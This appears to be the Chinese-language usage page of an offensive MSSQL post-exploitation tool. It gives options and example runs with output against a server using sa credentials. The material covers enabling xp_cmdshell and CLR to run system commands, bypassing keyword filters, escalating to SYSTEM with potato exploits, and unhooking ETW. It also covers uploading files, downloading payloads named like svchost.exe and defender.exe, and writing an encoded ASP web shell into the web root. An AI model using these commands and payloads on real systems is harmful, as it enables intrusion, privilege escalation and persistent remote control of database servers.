MSSQL渗透多功能命令利用工具

https://github.com/Ridter/PySQLToolshttps://github.com/uknowsec/SharpSQLToolshttps://github.com/Ridter/MSSQL_CLRhttps://github.com/JKme/cube/blob/master/core/sqlcmdmodule/mssql3.gohttps://quan9i.top/post/SQL%20Server%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%B1%87%E6%80%BB/

NAME:   Mssql Toolkit - mssql command toolUSAGE:   mssql-command-tools_Windows_64.exe [global options] command [command options] [arguments...]AUTHOR:   Microsoft.com clr参考: https://github.com/uknowsec/SharpSQLTools/COMMANDS:   help, h  Shows a list of commands or help for one commandGLOBAL OPTIONS:   --server value, --host value, -s value  The database server (default: "127.0.0.1")   --user value, -u value                  The database user (default: "sa")   --password value, -p value              The database password   --database value, -d value              The database name (default: "msdb")   --port value, -P value                  The database port (default: 1433)   --option value                          -xcmd, -X powershell (default: "whoami")   --query value, -q value, --sql value    SQL query (default: "select @@version")   --cmd value, -c value, --exec value     Exec System Command | xp_cmdshell命令执行 (default: "whoami")   --cmd1 value, --c1 value                Exec System Command | sp_oacreate无回显执行 (default: "whoami >C:\whoami.log")   --cmd2 value, --c2 value                Exec System Command | sp_oacreate有回显执行 | wscript.shell (default: "whoami")   --cmdsp value                           Exec System Command | sp_oacreate有回显执行 | {72C24DD5-D70A-438B-8A42-98424B88AFB8} (default: "whoami")   --cmd3 value, --c3 value                Exec System Command | clr执行 | clr命令参考: https://github.com/uknowsec/SharpSQLTools/ (default: "clr_exec whoami")   --cmdpy value                           Exec System Command | clr执行 | clr命令参考: https://github.com/Ridter/PySQLTools (default: "clr_exec whoami")   --cmd4 value, --c4 value                Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")   --cmd5 value, --c5 value                Exec System Command | 自写clr执行 (default: "-c4 net -c5 user")   --cmd6 value, --c6 value                Exec System Command | xp_cmdshell命令执行|过滤了xp_cmdshell等关键字提交方法语句 (default: "-c6 whoami")   --cmd7 value, --c7 value                Exec System Command | 自写clr执行 (default: "-c7 whoami")   --cmd8 value, --c8 value                Exec System Command | r language command (default: "-c8 whoami")   --cmd9 value, --c9 value                Exec System Command | python language command (default: "-c9 whoami")   --cmd10 value, --c10 value              Exec System Command | createAndStartJob command (default: "-c10 whoami >c:\windows\temp\123.txt")   --cmd11 value, --c11 value              Exec System Command | 自写clr执行 | --option -x --cmd11 cmd | --option -X --cmd11 powershell (default: "--option -x --cmd11 cmd")   --dir value, --dirtree value            xp_dirtree列目录 | dir c:   --path value                            网站路径 -path + -code | c:inetpubwwwrootcmd.asp (default: "c:\inetpub\wwwroot\cmd.asp")   --local value                           本地路径 localFile (default: "c:\1.txt")   --remote value                          远程路径 remoteFile (default: "C:\Windows\Temp\1.txt")   --code value                            -path + -code | 如果代码有"就加来匹配<%eval request("cmd")%>网站路径和asp密码默认:LandGrey (default: "<%@codepage=65000%><%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>")   --downurl value                         下载文件的url地址 | http://www.microsoft.com/defender.exe   --filepath value                        下载文件的路径 | c:programdatasvchost.exe   --debug                                 Debug info   --enable, -e                            Enabled xp_cmdshell   --disable, --diclose                    Disable xp_cmdshell   --ole, --oleopen                        Enabled sp_oacreate   --dole, --dolose                        Disable sp_oacreate   --clr, --clropen                        Enabled clr enabled   --dclr, --dclose                        Disable clr enabled   --rlce, --rlceopen                      r|python languag eenabled   --jobopen                               MSSQL Agent Job服务开启   --install_clr, --in_clr                 install clr  | --cmd3 "clr_exec whoami" | clr命令参考: https://github.com/uknowsec/SharpSQLTools/   --uninstall_clr, --un_clr               uninstall clr | --cmd3 "clr_exec whoami"   --installpy_clr, --inpy_clr             installpy clr  | --cmdpy "clr_exec whoami" | clr命令参考: https://github.com/Ridter/PySQLTools   --uninstallpy_clr, --unpy_clr           uninstallpy clr | --cmdpy "clr_exec whoami"   --install_clrcmd, --in_clrcmd           install clrcmd | "--c4 net --c5 user"   --uninstall_clrcmd, --un_clrcmd         uninstall clrcmd | "--c4 net --c5 user"   --install_clrcmd1, --in_clrcmd1         install clrcmd1 | --cmd7 "whoami"   --uninstall_clrcmd1, --un_clrcmd1       uninstall clrcmd | --cmd7 "whoami"   --install_clrcmd2, --in_clrcmd2         install clrcmd2 | --cmd11 "whoami"   --uninstall_clrcmd2, --un_clrcmd2       uninstall clrcmd2 | --cmd11 "whoami"   --upload                                --upload --local c:svchost.exe --remote C:WindowsTempsvchost.exe   --help, -h                              show help

开启xp_cmdshell组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --enable/--e开启sp_oacreate组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin --ole/--o开启ole组件mssql-command-tools_Windows_64.exe -s 127.0.0.1 -u sa -p admin -clrxp_cmdshell 执行mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd "whoami"nt servicemssqlserver绕过过滤xp_cmdshell关键字mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd6 "whoami"nt servicemssqlserversp_oacreate 执行 略微不一样，但大致一样mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd2 "whoami" nt servicemssqlservermssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdsp "whoami" nt servicemssqlserver安装SharpSQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --install_clrClrcmd Install SharpSQLTools CLR Success.执行命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_exec whoami"mssql: [+] Process: cmd.exemssql: [+] arguments:  /c whoamimssql: [+] RunCommand: cmd.exe  /c whoamimssql:mssql: nt servicemssqlserver提权mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_badpotato whoami" mssql: [*] CreateNamedPipeW Success! IntPtr:4048mssql: [*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:1816351484896mssql: [*] ConnectNamePipe Success!mssql: [*] CurrentUserName : MSSQLSERVERmssql: [*] CurrentConnectPipeUserName : SYSTEMmssql: [*] ImpersonateNamedPipeClient Success!mssql: [*] OpenThreadToken Success! IntPtr:6840mssql: [*] DuplicateTokenEx Success! IntPtr:6556mssql: [*] SetThreadToken Success!mssql: [*] CreateOutReadPipe Success! out_read:5536 out_write:5528mssql: [*] CreateErrReadPipe Success! err_read:3436 err_write:5072mssql: [*] CreateProcessWithTokenW Success! ProcessPid:9608mssql: nt authoritysystem卸载SharpSQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstall_clrUninstall SharpSQLTools CLR Success.安装PySQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --installpy_clrClrcmd Install PySQLTools Clr Success.执行命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmdpy "clr_exec whoami" mssql: [+] Successfully unhooked ETW!mssql: [*] No dll to patchmssql: [+] Process: cmd.exemssql: [+] arguments:  /c whoamimssql: [+] RunCommand: cmd.exe  /c whoamimssql:mssql: nt servicemssqlserver提权卸载PySQLTools clrmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --uninstallpy_clrUninstall PySQLTools Clr Success.mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd4 net -cmd5 user\ 的用户帐户-------------------------------------------------------------------------------Administrator            DefaultAccount           GuestWDAGUtilityAccount命令运行完毕，但发生一个或多个错误。mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd7 "whoami"   mssql: Command is running, please wait.mssql: nt servicemssqlservermssql: nt servicemssqlserverr language command (default: "-c8 whoami")mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd8 "whoami" nt servicemssqllaunchpadpython language command (default: "-c9 whoami")mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd9 "whoami"nt servicemssqllaunchpad执行CreateAndStartJobmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd10 "whoami >c:\programdata\test.txt"CreateAndStartJob Command Success!当权限不足的时候mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -cmd3 "clr_efspotato net start SQLSERVERAGENT"列目录mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\programdata"subdirectory    depth   file123.dllApplication DataDocumentsHuorongMicrosoftMSSQLSERVERPackage Cacheregid.1991-06.com.microsoftSoftwareDistributionSSISTelemetryTemplatestest.txtUSOPrivateUSOSharedVMware「开始」菜单桌面Command List Dir Success.-x cmd命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -x --cmd11 "whoami"[]nt servicemssqlserver-X powershell命令mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -option -X --cmd11 "Get-Process explorer"[]Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName-------  ------    -----      -----     ------     --  -- -----------   2296     113    71352     183772              1304   1 explorer上传文件mssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 --upload --local c:Database.dll --remote C:programdataDatabase.dll [*] Uploading 'c:Database.dll' to 'C:programdataDatabase.dll'...[!] C:programdataDatabase.dll Upload Successmssql-command-tools_Windows_64.exe -s 192.168.3.186 -u sa -p Admin12345 -dir "c:\programdata"subdirectory    depth   file123.dllApplication DataDatabase.dll